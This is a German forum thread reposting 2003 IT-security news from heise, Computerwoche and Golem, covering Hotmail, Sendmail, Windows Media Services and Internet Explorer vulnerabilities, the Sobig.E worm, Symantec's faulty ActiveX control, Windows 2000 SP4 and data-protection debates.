NEWS AUS DEM IT-SECURITY BEREICH

Diskutiere NEWS AUS DEM IT-SECURITY BEREICH im Security-Zone - Sicherheitslücken, Virenschutz Forum im Bereich Hardware & Software Forum; IHK: Deutsche Firmen vernachlässigen Computer-Sicherheit Deutsche Firmen vernachlässigen nach Ansicht des Computerfachmanns Karlfried Thorn...
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #101
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
IHK: Deutsche Firmen vernachlässigen Computer-Sicherheit

Deutsche Firmen vernachlässigen nach Ansicht des Computerfachmanns Karlfried Thorn von der Industrie- und Handelskammer (IHK) Darmstadt die IT-Sicherheit. Bereits 60 Prozent der Unternehmen seien Opfer von Datenräubern geworden, sagte Thorn bei einem hessenweiten Aktionstag zum Einsatz von Computern in der Wirtschaft. Wirtschaftsminister Alois Rhiel wies ebenfalls auf die Bedeutung der IT-Sicherheit hin. An dem Aktionstag beteiligten sich Darmstadt, Frankfurt, Kassel, Wiesbaden, Gießen und Fulda.

Datenräubern werde es zu leicht gemacht, Passwörter mitzulesen und sich damit in Rechnersystem einzuklinken, sagte Thorn. Dort könnten sie dann außerdem Computerviren und -würmer freisetzen. Damit entstehe nicht nur dem Unternehmen ein Schaden, sondern auch Kunden und Geschäftspartnern. Ein wirksamer Schutz sei deshalb eine volkswirtschaftliche Pflicht. Auch die Banken legten bei der Kreditvergabe immer mehr Wert auf Risiko-Management.

Das Interesse an den Einsatzmöglichkeiten von Computern ist nach Ansicht von Thorn bei den Unternehmen ungebrochen. Zum Aktionstag hätten sich mehrere hundert Firmenvertreter angemeldet. Neben dem Sicherheitsaspekt (Darmstadt) standen Geschäfte im Internet (Wiesbaden), Telearbeit (Gießen), Sprach-Technologie (Fulda), neue Lernformen (Kassel) und Wissensmanagement (Frankfurt) auf dem Programm. Die Ergebnisse werden auf einer gemeinsamen Internetseite veröffentlicht. (anw/c't)


HeiseLink

______


Virenschutz auf Hotmail ausgehebelt



Die Sicherheitsexperten Hugo Vázquez Caramés und Toni Cortés Martínez von Infohacking, Experten beim Aufspüren von Cross-Site-Scripting-Schwächen, behaupten auf ihrer Webseite, den Virenschutz von Microsofts Hotmail aushebeln zu können. Attachments in Mails können auf den Hotmail-Servern mit einer URL angesprochen werden, die neben den Session- und Message-IDs auch die Kennzeichnung beinhaltet, ob dieses Attachment beim Öffnen oder Herunterladen auf Viren überprüft wird (&vscan=scan). Fehlt diese Kennzeichnung, die normalerweise in der URL enthalten ist, so wird damit der Virenschutz umgangen.

Ein Angreifer verschickt nun eine Mail mit zwei Attachements. Der erste Anhang beinhaltet ein Skript eingebettet in einem HTML-Dokument, der zweite Anhang ist eine Datei mit einem Virus. Öffnet ein Benutzer nun das erste Attachment, wird das Skript gestartet, wenn Javaskript aktiviert ist und Hotmail zu den vertrauenswürdigen Sites zählt. Das Skript ermittelt nun die Session- und Message-ID aus der aktuellen URL und startet den Download des zweiten Attachments, allerdings ohne Kennzeichnung für den Virenscan. Zwar wird dazu ein Fenster geöffnet, in dem der Benutzer dem Download zustimmen muss, meist wird der Inhalt solch eines Fensters aber kaum wahrgenommen und einfach nur weggeklickt.

Schützen kann man sich gegen dieses Problem nur, indem man nicht auf den Virenschutz von Hotmail vertraut. Ohnehin sollte auf jedem PC ein Virenscanner installiert sein: Einfallstore für Viren gibt es viele. Weitere Informationen zum Schutz vor Viren und Würmern bringen die Antiviren-Seiten von c't. (dab/c't)


HeiseLink
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #102
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
CD-ROM zum 19. Datenschutzbericht verfügbar

Der 19. Tätigkeitsbericht des Bundesbeauftragten für den Datenschutz ist nun kostenlos auf CD-ROM verfügbar und kann online bestellt werden. Neben dem Tätigkeitsbericht sind auf der CD-ROM auch das Bundesdatenschutzgesetz, die BFD-Info 4 ("Die Datenschutzbeauftragten in Behörde und Betrieb") und die BFD-Info 5 ("Datenschutz in der Telekommunikation") als HTML- und PDF-Dateien abgespeichert. Der Clou für alle Leser, die die c’t 4/2003 verpasst haben: Die bootfähige CD-ROM enthält die Linux-Distribution Knoppix 3.2. (ola/c't)


HeiseLink


____


Symantec verbessert Intrusion-Detection

MÜNCHEN (COMPUTERWOCHE) - Der Sicherheitsspezialist Symantec hat die Intrusion-Detection-Lösung "Manhunt", die Software "Intruder Alert" sowie das Produkt "Mantrap" in verbesserten Versionen auf den Markt gebracht. So erlaubt es Manhunt nun, Sicherheits-Updates in den im Netz verteilten Sensorenrechner einzuspielen. Auf diese Weise sind diese Spürgeräte auf dem aktuellen Stand und können beispielsweise neu entdeckte Schwachstellen in Applikationen und Betriebssystemen berücksichtigen. Die Updates stammen aus den Forschungslabors des Herstellers. Manhant unterstützte bisher schon das Update von Angriffssignaturen, doch erst jetzt lassen sich auch die Sensoren modifizieren. Neben Solaris läuft die Lösung nun zusätzlich unter Red Hat Linux.

Intruder Alert wurde in "Host IDS" umbenannt und erhielt neue Features, um Applikationen vor Attacken zu schützen. Über die Komponente "Process Management" können Administratoren verhindern, dass beispielsweise ein Web-Server nicht unbedingt benötigte Prozesse startet, was die möglichen Angriffsziele für Hacker einschränkt. Neuerdings läuft dieses Tool auch unter Windows XP, 2000 und NT 4.0.

Ebenfalls einen neuen Namen erhielt Mantrap, das nun "Decoy Server" heisst. Dabei handelt es sich um ein "Honeypot"-System, das einem Angreifer vorgaukelt, beispielsweise der tatsächliche E-Mail-Server des Unternehmens zu sein. Das Produkt zeichnet die Attacken auf und liefert dem Sicherheitsverantwortlichen so Informationen über mögliche Gefahren. Decoy Server 3.1 vermag nun verschiedene Instanzen eines Servers zu simulieren. Mehrere "Honigtöpfe" erhöhen laut Hersteller den Schutz vor Angriffen, da es den Eindringlingen schwerer fällt, das eigentliche Rechnersystem ausfindig zu machen. Zudem soll es so leichter werden, einen Hacker zu fangen. (fn)


ComputerWocheLink
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #103
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Aktuelle Sicherheitslücken


Code ausführbar in Sendmail



Software: Sendmail 8.9.0 bis 8.12.8 und Systeme die Sendmail nutzen
Typ: Konvertierungsfehler


Problem: In der prescan() Funktion existiert ein logischer Fehler bei der Konvertierung von char nach int.
Effekt: Ein Angreifer kann beliebigen Code auf dem Zielsystem ausführen.
Lokal: ja
Remote: ja


Exploit: sormail.c
Lösung: Die Hersteller betroffener Software haben meist Patches bereitgestellt. Ausserdem wird empfohlen auf Sendmail 8.12.9 upzudaten.


Veröffentlicht: 18.06.2003
Aktualisiert: 18.06.2003
Quelle: Bugtraq



ComputerWocheLink
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #104
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Symantec tauscht fehlerhaftes ActiveX-Control aus

Symantec hat das gestern gemeldete fehlerbehaftete ActiveX-Control durch eine aktualisierte Version ersetzt. Neuen Besucher des Online-Security-Checks wird automatisch die fehlerbereinigte Version installiert. Anwender, die noch das alte ActiveX-Control installiert haben, sollten die Webseiten von Symantec aufsuchen und einen neuen Sicherheitscheck starten. Das aktualisierte Control wird dann heruntergeladen und installiert.

Wer sich ganz von dem ActiveX-Control befreien möchte, löscht unter \Windows\Downloaded Program Files beziehungsweise \WINNT\Downloaded Program Files die Datei rufsi.dll (dab/c't)


HeiseLink


_____


Microsoft beruft obersten Datenschützer


MÜNCHEN (COMPUTERWOCHE) - Mit Peter Cullen hat Microsoft wieder einen Chief Privacy Strategist gefunden. Vorgänger Richard Purcell (53) hatte das Unternehmen bereits im März nach zehn Jahren verlassen. Der 44-jährige Cullen kommt von der Royal Bank of Canada in Toronto, für die er seit 1976 arbeitete und zuletzt als Corporate Privacy Offiver tätig war. Der geborene Engländer gilt als ausgesporchener Datenschutz- und Sicherheitsexperte, der zu diesen Themen auch regelmäßig auf Kongressen spricht.

Dass der neue Datenschutzchef des Softwarekonzerns nicht aus den USA, sondern aus Kanada kommt, stufen Datenschutzexperten als gute Nachricht ein. "Kanada ist in der Datschutzgesetzgebung den Vereinigten Staaten Lichtjahre voraus", sagte Beth Givens, Direktorin des Privacy Rights Clearinghouse in San Diego gegenüber IDG. Scott Charney, Chef der von Firmengründer Bill Gates ausgerufenen Initiative "Trustworthy Computing", sagte, dass Microsoft künftig in Sachen Datenschutz eine Vorreiterrolle übernehmen und nicht nur das umsetzen wolle, was die Gesetze vorgeben.

Ob Microsoft dieses hochgesteckte Ziel erreichen kann, muss sich noch zeigen. In der Vergangenheit machte die Gates-Company vor allem mit ihrem zentralen Authentifizierungsdienst Passport negative Schlagzeilen in Sachen Sicherheit und Datenschutz. Sowohl die amerikanische Regulierungsbehörde Federal Trade Commision (FTC) als auch die europäische Union beäugen den Internet-Single Sign-On-Dienst mit Argwohn. Die EU drängte den Konzern, den Datenschutz für die Anwender zu verbessern. Die FTC vereinbarte mit Microsoft weitreichendere Auflagen. Sollte die Firma die Privatsphäre ihrer Kunden nicht ausreichend schützen, droht jeweils eine Strafe in Höhe von 11.000 Dollar. In der Vergangenheit gab es immer wieder Sicherheitspannen: So entdeckte ein pakistanischer Sicherheitsspezialist im Mai einen schwerwiegenden Fehler im Passport-System, über den sich Angreifer Zugriff auf beliebige Nutzerkonten verschaffen können. (am)



ComputerWocheLink
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #105
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Symantec torpediert Sicherheit mit fehlerhaftem Active-X-Script

MÜNCHEN (COMPUTERWOCHE) - Der Anbieter von Sicherheitssoftware Symantec räumte ein, im Rahmen seines Online Security Check mit einem fehlerhaften ActiveX-Script gearbeitet zu haben. Symantec-Kunden können ihre Rechner online auf potenzielle Sicherheitslücken prüfen lassen. Dazu wird ein Script von der Website des Security-Spezialisten heruntergeladen, das den Sicherheitsstatus des jeweiligen Rechners aufnimmt und auf mögliche Gefahren hinweist. Die entsprechenden Active-X-Komponenten heißen "Symantec RuFSI Utility Class" oder "Symantec RuFSI Registry Information Class". Beide Scripte verbleiben nach dem Sicherheits-Scan auf den Rechnern und könnten dort Hackern den Zugang zu den Systemen erlauben, warnt das Unternehmen. Mittlerweile seien die fehlerhaften Scripte ausgetauscht, berichten die Verantwortlichen. Nutzer, die in letzter Zeit den Security Check genutzt hätten, sollten den Vorgang wiederholen. Dabei würden die alten Scripte mit fehlerfreien Active-X-Komponenten überschrieben und damit die Sicherheitslücke geschlossen. Künftig will Symantec seine Sicherheitsprüfung via Netz mit einem Tool ergänzen, das den Nutzern erlaubt, nach Abschluss des Tests alle dafür notwendigen Scripte auf dem eigenen Rechner zu löschen. Damit sei die Gefahr allerdings noch nicht vorbei, warnt Chris Wysopal, Sicherheitsexperte bei @Stake. Hacker könnten versuchen, das Script, das nach wie vor auf zahlreichen Rechnern liegt, abzugreifen und für die eigenen Einbruchsversuche zu missbrauchen. (ba)


ComputerWocheLink


Heute eher was spärlich....sorry!
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #106
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Bill Gates: IT schafft Sicherheit

George Orwell, der am gestrigen Mittwoch 100 Jahre alt geworden wäre, hat in seinem Roman "1984" eine düstere Zukunft gezeichnet, in der die Menschen der totalen Kontrolle der Technik unterliegen. Privatsphäre existiert dort nicht, Big Brother ist allgegenwärtig. Diese Vision einer Zukunft der Unterdrückung durch technische Einrichtungen teilt Microsoft-Mitgründer und Chief Software Architect Bill Gates nicht. In seiner Rede auf der Konferenz des US-amerikanischen Department of Homeland Security (DHS) sprach er davon, dass Informationstechnologie eher dazu beitragen werde, Sicherheit und Privatsphäre zu schaffen, als sie zu unterminieren.

Technik führe die Menschen zusammen, betonte Gates, könne aber auch missbraucht werden, um die Menschen auseinander und die Regierungsgeschäfte zum Erliegen zu bringen. Die Frage sei daher, ob die Bedrohung durch feindselige Elemente, die mit Hilfe von IT Privatsphäre und Sicherheit der Bürger bedrohten, dazu führen wird, dass die Menschen sich aus der IT zurückziehen. "Wir bei Microsoft sind da eher optimistisch", meinte Gates, "die Gefahren ignorieren wir aber trotzdem nicht."

Nach der Vorrede kam er schnell zum Punkt: IT sei für Menschen häufig ein rotes Tuch, speziell dann, wenn uns um die Mitteilung persönlicher Daten ginge. Darum müsse IT für Vertrauen sorgen, Daten sollten sicher und verlässlich gespeichert werden können. "Diesem Anspruch auf Sicherheit, Privatsphäre, Verlässlichkeit und Integrität werden wir mit unsere Trustworthy-Computing-Initiative gerecht", konstatierte Gates, "Trustworthy Computing hat oberste Priorität." Allein im letzten Jahr habe er 8500 Windows-Entwickler abgezogen, nur damit sie sich monatelang mit der Sicherheit ihres Codes auseinander setzen können. Hunderte Millionen US-Dollar habe diese Aktion gekostet, deren Ergebnisse in den aktuellen Windows Server 2003 eingeflossen seien.

Aber Gates warnt auch vor allzu großen Erwartungen: "Trustworthy Computing ist ein fortlaufender Prozess, in dem wir ständig lernen und etwas verbessern müssen." Dennoch sehe Microsoft zu, dass Software von Haus aus Secure-by-design sei -- der Code Angriffen standhalte --, Secure-by-default -- ihre Grundeinstellung bereits maximale Sicherheit biete -- und Secure-by-deployment -- es also leicht sei, das System stets auf dem aktuellen Stand zu halten. Damit wolle er Probleme in den Griff bekommen, bevor sie entstehen.

Auf der Konferenz, die von dem Information Technology Industry Council (ITIC) und dem Center for Strategic and International Studies (CSIS) organisiert wurde, lobte er auch die Bemühungen des DHS, die Kommunikationsbarrieren zwischen den Regierungsorganisationen abzubauen und damit für mehr Informationstransparenz zu sorgen -- wichtige Schritte, um den Strafverfolgungsbehörden die Arbeit erleichtern und frühzeitig Warnungen vor Terrorangriffen verbreiten zu können. Diese Bestrebungen machten die Heimat sicherer und beugten George Orwells Albträumen vor, resümierte Gates. "Denn Orwell hat nicht vorausgesehen, dass Technik Sicherheit und Privatsphäre schützen kann, indem sie Computer und die von ihnen verarbeiteten Informationen absichert." Hier sei noch viel zu tun, und ein Teil der Arbeit sei die Entwicklung der Next Generation Secure Computing Base (NGSCB): "Wir arbeiten mit zahlreichen Partnern aus der Hard- und Softwarebranche zusammen, um den nötigen Schutz gegen kommende Viren, Bedrohungen durch Hacker oder jeglichen Informationsdiebstahl gewährleisten zu können." (ola/c't)


HeiseLink


________



Whois für Big Brother 2003

Heftiger Streit entbrannte zwischen Domain-Registraren, Datenschützern sowie Bürgerrechtlern auf der einen und US-Offiziellen auf der anderen Seite um Vorstellungen zum Umgang mit den Whois-Daten über Inhaber von Domains und IP-Adressen -- bis hin zu Vorwürfen, mit dem Whois-Protokoll solle George Orwells Big Brother auf den technisch neuesten Stand gebracht werden. Ein Vertreter des US-Justizministeriums bezeichnete jedenfalls jegliche Einschränkung des öffentlichen Zugangs zu den Whois-Daten aus Datenschutzgründen als ernsthafte Behinderung der Strafverfolgung.

Bei einer Podiumsdiskussion beim ICANN-Treffen in Montreal sagte John LoGalbos vom US-Justizministerium: "Die Strafverfolger brauchen einen offenen Zugang zu den Whois-Daten, um Kriminalität wie Betrug, Piraterie, Kinderpornografie und auch Hacking zu bekämpfen." Datenschutzgesetzgebung, die diesen Zugang erschwere, beruhe auf einer "rückwärtsgerichteten Analyse" und landete damit einen Seitenhieb gegen die von EU-Vertretern geäußerte Position.

Das von einer Mehrheit der Beteiligten favorisierte System abgestufter Zugriffsrechte auf die Whois-Informationen zu Inhabern von Domains und IP-Adressen im Internet-Namensraum lehnte LoGalbos ab, da es die Behörden anders als jetzt zu geregelten juristischen Auskunftsverfahren verpflichten würde. "Es ist ein Unterschied wie Tag und Nacht, ob man eine Auskunft per einstweiliger Verfügung bekommt oder durch direkten Zugang zur Datenbank." Die juristischen Mühlen mahlten meist zu langsam, vor allem auch, wenn es um grenzüberschreitende Verfahren gehe.

Die beiden scheidenden, von den Nutzern gewählten ICANN-Direktoren Andy Müller-Maguhn und Karl Auerbach kritisierten LoGalbos' Vorstellungen scharf und erinnerten beide an Georg Orwell, der am gestrigen Mittwoch seinen hundertsten Geburtstag gefeiert hätte: "Wenn Orwell hier gewesen wäre, hätte er wohl ein Update von 1984 auf 2003 gemacht. Was wir hier hören, ist nichts anderes, als dass die Bürgerrechte, die hart erkämpft wurden, ausgehebelt werden, nur weil es bequem ist." Wendy Seltzer von der Electronic Frontier Foundation fragte: "Warum sollen rechtmäßige Verfahren in der Online-Welt enden?"

Auch LoGalbos Seitenhieb auf unzeitgemäßen Datenschutz, der überprüft werden müsse, wenn er die notwendigen Daten unzugänglich mache, traf auf Widerspruch. Amadeu Abril i Abril, ebenfalls scheidender ICANN-Direktor, riet im Gegenzug, die US-Gesetzgebung datenschutzrechtlich zu verbessern. Die Vertreterin der EU-Kommission, Diana Alonso Blas, riet den europäischen Domain-Registraren von den ICANN-Verträgen in der aktuellen Form ab, da sie mit europäischem Datenschutzrecht nicht vereinbar seien. Tom Keller, der für den deutschen Hoster Schlund und Partner Mitglied im für allgemeine Top Level Domains (gTLD) zuständigen Gremiums (GNSO) ist, betonte: "Ich betrachte Datenschutz nicht als einen zusätzlichen Service, für den ich als Privatperson bezahlen muss. Ich halte das für ein ganz natürliches Recht."

Während Europas Länderdomain-Registrare bereits verschiedene Modelle zur Umsetzung von Datenschutzbestimmungen in Angriff genommen haben, bleibt den gTLD-Registraren nur eine Neuverhandlung der ICANN-Verträge und die Hoffnung, dass sich die Idee flexibler Modelle für einen abgestuften Whois-Zugang durchsetzt. Eine spezielle TLD für nichtkommerzielle, datenschutzfreundliche Domains halten die meisten Registrare nicht für sinnvoll. (Monika Ermert) / (jk/c't)


HeiseLink


______


Neue Patches von Microsoft gegen kleine und große Sicherheitslöcher

Die in neuen Sicherheitsbulletins von Microsoft enthaltenen Patches MS03-021 und MS03-22 beheben Fehler im Windows Media Player und den Windows Media Services.

Vergleichsweise harmlos erscheint der Fehler im Windows Media Player: Durch ein fehlerhaftes ActiveX-Control im Media Player 9.0 kann ein Angreifer Zugriff auf die Media Library des Benutzers erhalten und dort Einträge löschen und verändern. Nach Angaben von Microsoft sind dadurch aber nicht die eigentlichen Media-Dateien bedroht, sondern nur die Meta-Daten für die Dateien in der Bibliothek. Zum Angriff auf das fehlerhafte Control reicht schon eine E-Mail im HTML-Format beziehungsweise eine E-Mail mit einem HTML-Dokument im Anhang aus. Der Windows Media Player 9.0 ist im Lieferumfang von Windows Server 2003 enthalten, Versionen für Windows 98(SE), ME, 2000 und XP stellt Microsoft auf seinen Websites bereit.

Das Sicherheitsloch in den Windows Media Services unter Windows 2000 ist weit schwerwiegender, bietet es doch einmal mehr die Möglichkeit, beliebigen Code auf dem System auszuführen. Ein Buffer Overflow in der für das Logging der Media Services zuständigen nsiislog.dll kann zum Einschleusen und Ausführen von beliebigem Code ausgenutzt werden. Ein ähnlicher Fehler in der gleichen Funktion wurde im vergangenen Mai zunächst als unkritisch eingestuft. Nach ersten Proof-of-Concept-Exploits erhöhte dann Microsoft die Severing Rate auf 'Important'.

Das entsprechende Sicherheitsbulletin MS03-019 enthält fast den gleichen Wortlaut wie das neue Bulletin MS03-022. Anhand des Schwachstellen-Kennzeichners gemäß CVE CAN-2003-0349 läßt sich sehen, dass Microsoft seit dem 28.5.2003 von dem neuen Fehler wusste. Offenbar wurde dieser beim Review des Codes zum Erstellen des ersten Patches entdeckt. Bei beiden Fehlern reicht ein spezieller HTTP-Request aus, um den Buffer Overflow zu provozieren. Betroffen sind durch den neuen Fehler laut Microsoft die Media Services 4.1 unter Windows 2000, standardmäßig wird der Dienst nicht mitinstalliert. (dab/c't)


HeiseLink


______


Explosionsartige Verbreitung eines weiteren Sobig-Wurms


Starke Verbreitung durch gefälschte Absenderadressen


Zum dritten Mal in Folge schafft es eine Variante des Sobig-Wurms, sich besonders rasant im Internet zu verbreiten. Auch der Wurm Sobig.E beendet seine Aktivitäten ab einem bestimmten Datum und ist danach nicht mehr aktiv. Dabei werden gefälschte Absenderadressen verwendet, was die Identifikation des befallenen Systems stark erschwert.

Nach Informationen zahlreicher Hersteller von Antiviren-Software hat sich auch der Wurm Sobig.E in kürzester Zeit sehr stark verbreitet. Zur Verbreitung über E-Mail sucht der Wurm auf allen lokalen Laufwerken in den Dateien mit den Endungen .wab, .dbx, .htm, .html, .eml sowie .txt nach gültigen E-Mail-Adressen. Dann versendet sich der Wurm über eine eigene SMTP-Engine mit einer beliebigen Absenderadresse, die er bei der Adressensammlung gefunden hat. Somit ist der wahre Versender einer verseuchten E-Mail nicht ohne weiteres auszumachen, was die Eindämmung des Wurms erschwert.

Die Wurm-Komponente befindet sich - wie üblich - im Mail-Anhang mit wechselnden Bezeichnungen, der vom Anwender manuell geöffnet werden muss und zudem sogar komprimiert ist. Das bedeutet, dass man als Betroffener recht viel Aufwand betreiben muss, um den verseuchten Anhang zu öffnen und die Wurm-Verbreitung zu aktivieren. Die Betreffzeile erzeugt der Wurm aus einer Auswahl von mehreren Textteilen, während der Nachrichtentext immer "Please see the attached zip file for details." lautet. Wird der Wurm aktiviert, kopiert er sich in das Windows-Verzeichnis und legt einen Registry-Eintrag an, um so bei jedem Systemstart automatisch geladen zu werden.

Neben der Mail-Verbreitung sucht der Wurm nach angeschlossenen Netzlaufwerken und versucht sich in die Autostartordner der betreffenden Windows-Verzeichnisse zu kopieren, um so auch auf anderen Systemen beim Programmstart geladen zu werden. Am 14. Juli 2003 beendet der Wurm sämtliche Aktivitäten und verbreitet sich somit nur bis zum 13. Juli 2003.

Die meisten Hersteller von Antiviren-Software stellen bereits aktualisierte Virensignaturen zum Download bereit. Symantec bietet ein kostenloses Tool an, um den Wurm von einem befallenen System zu entfernen.

Golem.de Link


__________




Internet Explorer: Schwere Active-Scripting-Sicherheitslücke


Angreifer können beliebigen Programmcode auf einem fremden System ausführen


In Microsofts Internet Explorer wurde erneut eine schwere Sicherheitslücke bei der Nutzung von Active Scripting entdeckt. Wie die Sicherheitsexperten von Secunia.com berichten, kann ein Angreifer über eine präparierte Webseite den Browser zum Absturz bringen oder beliebigen Programmcode mit den Nutzerrechten ausführen. Bislang bietet Microsoft keinen Patch zur Abhilfe an.

Um sich vor Angriffen durch Ausnutzung dieser Sicherheitslücke zu schützen, bleibt derzeit nur die Möglichkeit, Active Scripting im Internet Explorer zu deaktivieren. Dann werden entsprechende Inhalte nicht mehr ausgeführt, so dass auch die Sicherheitslücke nicht ausgenutzt werden kann. Von dem Sicherheitsleck ist der Internet Explorer in den Versionen 5.01, 5.5 und 6.0 betroffen.

Golem.de Link
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #107
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Aktuelle Sicherheitslücken



DoS in PerlEdit



Software: PerlEdit 1.0 7
Typ: Denial of Service


Problem: PerlEdit bindet an den Port 1956 wenn es ausgeführt wird.
Effekt: Wird von aussen eine Verbindung zu diesem Port aufgebaut, stürzt PerlEdit ab.
Lokal: nein
Remote: ja


Exploit: Es wird kein Exploit benötigt
Lösung: Derzeit sind uns keine Patches/Updates bekannt.


Veröffentlicht: 25.06.2003
Aktualisiert: 25.06.2003
Quelle: Bugtraq


ComputerSecurityLink
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #108
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Service Pack 4 für Windows 2000 ist da

Nachdem am Mittwoch dieser Woche bereits das Service Pack 4 für die englische Ausgabe von Windows 2000 auf Microsofts Servern gesichtet wurde, ist nun auch die offizielle Informations-Seite dazu online, samt Verweis auf die deutsche Version. Das Service Pack enthält neben der Unterstützung für USB-2.0-Controller und das Authentifizierungsprotokoll IEEE 802.1x über 650 neue Bug-Fixes, darüber hinaus den Inhalt der Service Packs 1 bis 3. Wer die oder einige Hot-Fixes aus den letzten elf Monaten bereits installiert hat, kann beim Download kräftig sparen: Die Express-Installation prüft beim Update, welche Dateien aus dem 129 MByte großen Komplettpaket der Rechner überhaupt braucht, und saugt nur die vom Microsoft-Server. (hos/c't)


HeiseLink
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #109
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Aktuelle Sicherheitslücken

Code ausführbar in MS Windows Media Services



Betriebsystem: MS Windows 2000 Server, Advanced Server, Datacenter Server, (
Software: Microsoft Windows Media Services
Typ: Fehlerhafte Ausnahmebehandlung


Problem: Die Datei nsiislog.dll, die im WMS für das logging zuständig ist kann bestimmte HTTP Anfragen nicht korrekt behandeln.
Effekt: Dieser fehler kann einen Crash des IIS (Internet Information Server) oder das Ausführen von beliebigen Code zur Folge haben.
Lokal: nein
Remote: ja


Exploit: Derzeit sind uns keine Exploits bekannt.
Lösung: Microsoft Patch


Veröffentlicht: 26.06.2003
Aktualisiert: 26.06.2003
Quelle: Microsoft Security Bulletin MS03-022
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #110
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Kostenlose Online-Virenscanner -- die gelegentliche Schnell-Hilfe

Kostenlose Online-Virenscanner sind nützlich, aktuell und bequem. Sie bieten zwar keinen vollwertigen Ersatz für ein kostspieliges Antiviren-Paket, eignen sich aber gut dazu, gelegentlich einzelne Dateien oder sogar den gesamten PC auf Viren zu untersuchen, schreibt c't in der aktuellen Ausgabe 14/03.

Online-Virenscanner bieten eine bequeme Möglichkeit, Dateien aus dem Internet, die möglicherweise mit Viren oder Würmern verseucht sind, vor dem Öffnen überprüfen zu lassen. Man sendet sie einfach an den Upload-Dienst eines Virenscanner-Herstellers, wo aktuelle Programme auf Schädlingssuche gehen -- auch für unerfahrene Anwender ist das kinderleicht. Um den kompletten PC auf Viren untersuchen lassen, muss man ein Hilfsprogramm herunterladen, das dem Online-Virenscanner den direkten Zugriff ermöglicht. Die Dienste der Hersteller McAfee, BitDefenders, Panda Antivirus, Symantec, RAV Antivirus und Command Antivirus nutzen dafür ActiveX-Komponenten des Internet Explorer. Für Netscape-Nutzer empfiehlt sich nur Trend Micros Housecall, der ein spezielles Java-Zugangsprogramm zum Download anbietet.

Auch sicherheitsbewusste Anwender sollten nur in Ausnahmefällen die Viren-Überprüfung mit Active-X-Controls im Internet Explorer zulassen , da sie seinerseits Türöffner für Angreifer sein können -- diese Erfahrung mussten gerade Anwender des Online-Security-Checks von Symantec machen. Das Sicherheitsleck korrigierte der Anbieter allerdings recht zügig.

"Bei konkreten Indizien für Virenbefall sollte man diese Online-Dienste keinesfalls nutzen, weil Viren bei bestehender Internet-Verbindung noch mehr Schaden anrichten können", warnt c't im Fazit des Berichts. Empfehlenswert seien die Online-Virenscanner zum vorsorglichen Untersuchen eines E-Mail-Anhangs oder der vom Nachbarn gebrannten Programm-CD.

Einen detaillierten Bericht zu den Online-Virenscannern mit Hinweisen zu den Angeboten der einzelnen Antiviren-Firmen bringt c't in Ausgabe 14/2003 (ab Montag, den 30. Juni, im Handel). Weitere Hinweise zum Schutz vor Viren und Würmen sowie Links zu Antiviren-Programmen und -Herstellern bieten darüber hinaus die Antiviren-Seiten von c't. (jk/c't)


HeiseLink

_______


Datenschützer kritisiert Umgang mit Großem Lauschangriff


Unschuldige geraten ins Visier


Der Bundesbeauftragte für den Datenschutz, Joachim Jacob, hat kurz vor der Verhandlung des Bundesverfassungsgerichts über den Großen Lauschangriff am 1. Juli 2003 die Abhörpraxis in Wohnungen kritisiert.




Es sei "nicht tolerabel", dass ein Großteil der Bürger, die ins Visier des Großen Lauschangriffs geraten, nicht wie vorgeschrieben nachträglich benachrichtigt werden, sagte Jacob dem Nachrichtenmagazin Focus. "Ich erwarte vom Bundesverfassungsgericht, dass es den Behörden klarmacht, dass sie den Berichtspflichten großzügig nachkommen müssen." Nur bei "zeitnaher Information der Betroffenen" mache es noch Sinn, die Abhöraktion gerichtlich überprüfen zu lassen.

Als "hohen Preis" bezeichnete Jacob, dass sich unter den 239 Abgehörten etwa zur Hälfte unverdächtige Bürger fanden. Vielleicht lasse sich mit Stimmerkennung vermeiden, Gespräche von Unbescholtenen aufzuzeichnen, regte Jacob an.

Bisher lässt der Gesetzgeber das Abhören in Wohnungen bei 15 verschiedenen Delikten zu, in der Praxis konzentrieren sich die Lauschangriffe auf Rauschgift- und Tötungsdelikte. "Ich würde diesen Katalog der Anlasstaten enger fassen", sagte Jacob, der in der mündlichen Verhandlung in Karlsruhe am Dienstag als Sachverständiger auftritt. Nach Berechnungen des Klägers und FDP-Politikers Burkhard Hirsch brachte nicht einmal jede zweite der Abhöraktionen von 1999 bis 2001 relevante Ergebnisse für das Ermittlungsverfahren.

GolemLink
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #111
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Aktuelle Sicherheitslücken


DoS in HP/Compaq Tru64



Betriebsystem: Tru64 diverse 5.1
Typ: Denial of Service


Problem: Bei apprupter Beendigung einer Telnet-Session wird die ksh nicht vollständig beendet.
Effekt: Die ksh existiert weiter und benötigt exponentiell steigende CPU-Resourcen, bis das System nicht mehr reagiert.
Lokal: nein
Remote: ja


Exploit: Derzeit sind uns keine Exploits bekannt.
Lösung: HP/Compaq hat einen Patch zur Verfügung gestellt, der das Problem behebt.


